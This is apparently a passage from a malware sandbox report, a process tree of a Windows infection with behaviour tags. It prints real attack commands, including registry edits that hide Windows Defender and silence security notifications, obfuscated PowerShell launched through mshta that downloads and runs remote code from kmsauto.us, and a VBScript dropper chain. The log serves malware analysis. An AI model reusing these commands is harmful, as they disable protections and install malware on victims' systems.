C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\S-1-5-21-257790753-2419383948-818201544-1000\Microsoft.SecHealthUI_1000.22000.1.0_neutral__8wekyb3d8bbwe" /f5⤵PID:8080
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Appx\PackageState\S-1-5-21-257790753-2419383948-818201544-1000\Microsoft.SecHealthUI_8wekyb3d8bbwe" /f5⤵PID:7928
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v SettingsPageVisibility5⤵PID:1372
-
C:\Windows\system32\reg.exereg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v SettingsPageVisibility6⤵PID:7900
-
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "SettingsPageVisibility" /t REG_SZ /d "hide:windowsdefender;" /f5⤵PID:6908
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.Defender.SecurityCenter" /v "Enabled" /t REG_DWORD /d "0" /f5⤵PID:6284
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance" /v "Enabled" /t REG_DWORD /d "0" /f5⤵PID:700
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\INzzFcp2.com"C:\Users\Admin\AppData\Local\Temp\INzzFcp2.com"3⤵
- Executes dropped EXE
PID:5392 -
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" https://kmsauto.us/ra/Encoding.txt4⤵
- Blocklisted process makes network request
PID:5496 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $A='DowRing'.Replace('R','nloadstr');$B = 'WebCAMt'.Replace('AM','lien');$d='tnt'.Replace('tn','Ne');$link ='https://kmsauto.us/ra/ALL.txt';$t1='(New-OS'.Replace('S','bje');$t2='ct Sypek)'.Replace('pe','stem.$d.$B).$A($lin');$WC=I`E`X ($t1,$t2 -Join '')|I`E`X5⤵PID:5532
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe#cmd6⤵PID:7980
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe#cmd6⤵PID:964
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe#cmd6⤵PID:6600
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe#cmd6⤵PID:7908
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe#cmd6⤵PID:7736
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RPCM5VdB.com"C:\Users\Admin\AppData\Local\Temp\RPCM5VdB.com"3⤵
- Executes dropped EXE
PID:5936 -
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" https://kmsauto.us/Encoding.txt4⤵
- Blocklisted process makes network request
PID:2004 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $A='DowRing'.Replace('R','nloadstr');$B = 'WebCAMt'.Replace('AM','lien');$d='tnt'.Replace('tn','Ne');$link ='https://kmsauto.us/ALL.txt';$t1='(New-OS'.Replace('S','bje');$t2='ct Sypek)'.Replace('pe','stem.$d.$B).$A($lin');$WC=I`E`X ($t1,$t2 -Join '')|I`E`X5⤵
- Blocklisted process makes network request
PID:2264 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe#cmd6⤵PID:3856
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2264 -s 26246⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6644
-
-
-
-
-
-
C:\Users\Admin\Documents\Q2I2YzAMB_JBSO1VLoIrLXer.exe"C:\Users\Admin\Documents\Q2I2YzAMB_JBSO1VLoIrLXer.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:860 -
C:\Users\Admin\Documents\Q2I2YzAMB_JBSO1VLoIrLXer.exe"C:\Users\Admin\Documents\Q2I2YzAMB_JBSO1VLoIrLXer.exe"3⤵
- Executes dropped EXE
PID:5084
-
-
-
C:\Users\Admin\Documents\6ISgl_BtDTv9hSzZx6SmrqBl.exe"C:\Users\Admin\Documents\6ISgl_BtDTv9hSzZx6SmrqBl.exe"2⤵
- Executes dropped EXE
PID:4772
-
-
C:\Users\Admin\Documents\yklip9lLUdwW3N17zW8e9dl0.exe"C:\Users\Admin\Documents\yklip9lLUdwW3N17zW8e9dl0.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3056
-
-
C:\Users\Admin\Documents\ThuseeB9VMpA_ss9wUX0wqa6.exe"C:\Users\Admin\Documents\ThuseeB9VMpA_ss9wUX0wqa6.exe"2⤵
- Executes dropped EXE
PID:3052 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3052 -s 2443⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6340
-
-
-
C:\Users\Admin\Documents\B8EAiQM0r0gOaZgQvIQDDAyE.exe"C:\Users\Admin\Documents\B8EAiQM0r0gOaZgQvIQDDAyE.exe"2⤵
- Executes dropped EXE
PID:3000 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBSCripT: CloSe ( CReateOBjecT ("wSCRipT.sheLl"). RUN ( "cmD /q /C TYPe ""C:\Users\Admin\Documents\B8EAiQM0r0gOaZgQvIQDDAyE.exe"" > Bx0IuOFB.ExE && StArT BX0iUoFB.EXe -PyTJSIPDC12bsxp0f1 & iF """" == """" for %Q in ( ""C:\Users\Admin\Documents\B8EAiQM0r0gOaZgQvIQDDAyE.exe"" ) do taskkill -F -im ""%~NxQ"" ", 0, truE) )3⤵PID:3492
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /C TYPe "C:\Users\Admin\Documents\B8EAiQM0r0gOaZgQvIQDDAyE.exe" >Bx0IuOFB.ExE && StArT BX0iUoFB.EXe -PyTJSIPDC12bsxp0f1 & iF "" == "" for %Q in ("C:\Users\Admin\Documents\B8EAiQM0r0gOaZgQvIQDDAyE.exe" ) do taskkill -F -im "%~NxQ"4⤵PID:716
-
C:\Users\Admin\AppData\Local\Temp\Bx0IuOFB.ExEBX0iUoFB.EXe -PyTJSIPDC12bsxp0f15⤵
- Executes dropped EXE
PID:5832 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBSCripT: CloSe ( CReateOBjecT ("wSCRipT.sheLl"). RUN ( "cmD /q /C TYPe ""C:\Users\Admin\AppData\Local\Temp\Bx0IuOFB.ExE"" > Bx0IuOFB.ExE && StArT BX0iUoFB.EXe -PyTJSIPDC12bsxp0f1 & iF ""-PyTJSIPDC12bsxp0f1 "" == """" for %Q in ( ""C:\Users\Admin\AppData\Local\Temp\Bx0IuOFB.ExE"" ) do taskkill -F -im ""%~NxQ"" ", 0, truE) )6⤵PID:1440
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /C TYPe "C:\Users\Admin\AppData\Local\Temp\Bx0IuOFB.ExE" >Bx0IuOFB.ExE && StArT BX0iUoFB.EXe -PyTJSIPDC12bsxp0f1 & iF "-PyTJSIPDC12bsxp0f1 " == "" for %Q in ("C:\Users\Admin\AppData\Local\Temp\Bx0IuOFB.ExE" ) do taskkill -F -im "%~NxQ"7⤵PID:2804
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" .\BPJm7xC.Iwa,Rgac6⤵
- Loads dropped DLL
PID:3976
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -F -im "B8EAiQM0r0gOaZgQvIQDDAyE.exe"5⤵
- Kills process with taskkill
PID:5448
-
-
-
-
-
C:\Users\Admin\Documents\y8CjKi3AYSnoDbR9Q1TJtwob.exe"C:\Users\Admin\Documents\y8CjKi3AYSnoDbR9Q1TJtwob.exe"2⤵
- Executes dropped EXE
PID:700 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Ou3tPfureT.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Ou3tPfureT.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3928 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"4⤵PID:3792
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3928 -s 3044⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:5468
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\KU6UUiwSos.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\KU6UUiwSos.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:132 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"4⤵PID:5788
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 132 -s 2884⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:1632
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 132 -s 2884⤵
- Program crash
PID:5436
-
-
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe"C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:804 -
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
- Executes dropped EXE
PID:3820
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
- Executes dropped EXE
PID:5144
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:5900
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:4844
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
- Executes dropped EXE
PID:5020
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
- Executes dropped EXE
PID:5920
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
- Executes dropped EXE
PID:1804
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
- Executes dropped EXE
PID:2328
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:5916
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:4968
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4968 -s 284⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:1852
-
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:4648
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:3396
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:6148
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:6448
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:6680
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:6996
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:1396
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:6320
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:3816
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:5592
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:3592
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:3760
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:3964
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:5568
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:4580
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:3020
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:2884
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:6856
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:4700
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:1148
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:4040
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4116
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:6328
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6328 -s 284⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6428
-
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:4140
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:3908
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:7644
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:8112
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:5708
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:8052
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8052 -s 284⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:3280
-
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:7728
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:8180
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:7192
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:3100
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:2400
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:7572
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:7608
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:6780
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:7328
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:5196
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:6772
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:6148
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:2000
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:7840
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:8072
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:6960
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:1920
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:7136
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:2556
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:4224
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:6912
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:5148
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:7420
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:3080
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:2368
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:6604
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:4232
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:2192
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:8000
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:5916
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6892
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:5612
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:4704
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
- Executes dropped EXE
PID:5900
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:3912
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3912 -s 284⤵
- Program crash
PID:6272
-
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:3240
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
- Windows security modification
PID:6208
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:1876
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:6516
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:6808
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:5628
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:2508
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:4988
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:2216
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:5224
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:6832
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:1644
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:7612
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:7308
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:1604
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1604 -s 1644⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:2188
-
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:8132
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:5764
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5764 -s 284⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5820
-
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:7556
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7556 -s 1644⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:1464
-
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:5864
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:7876
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:3000
-
-
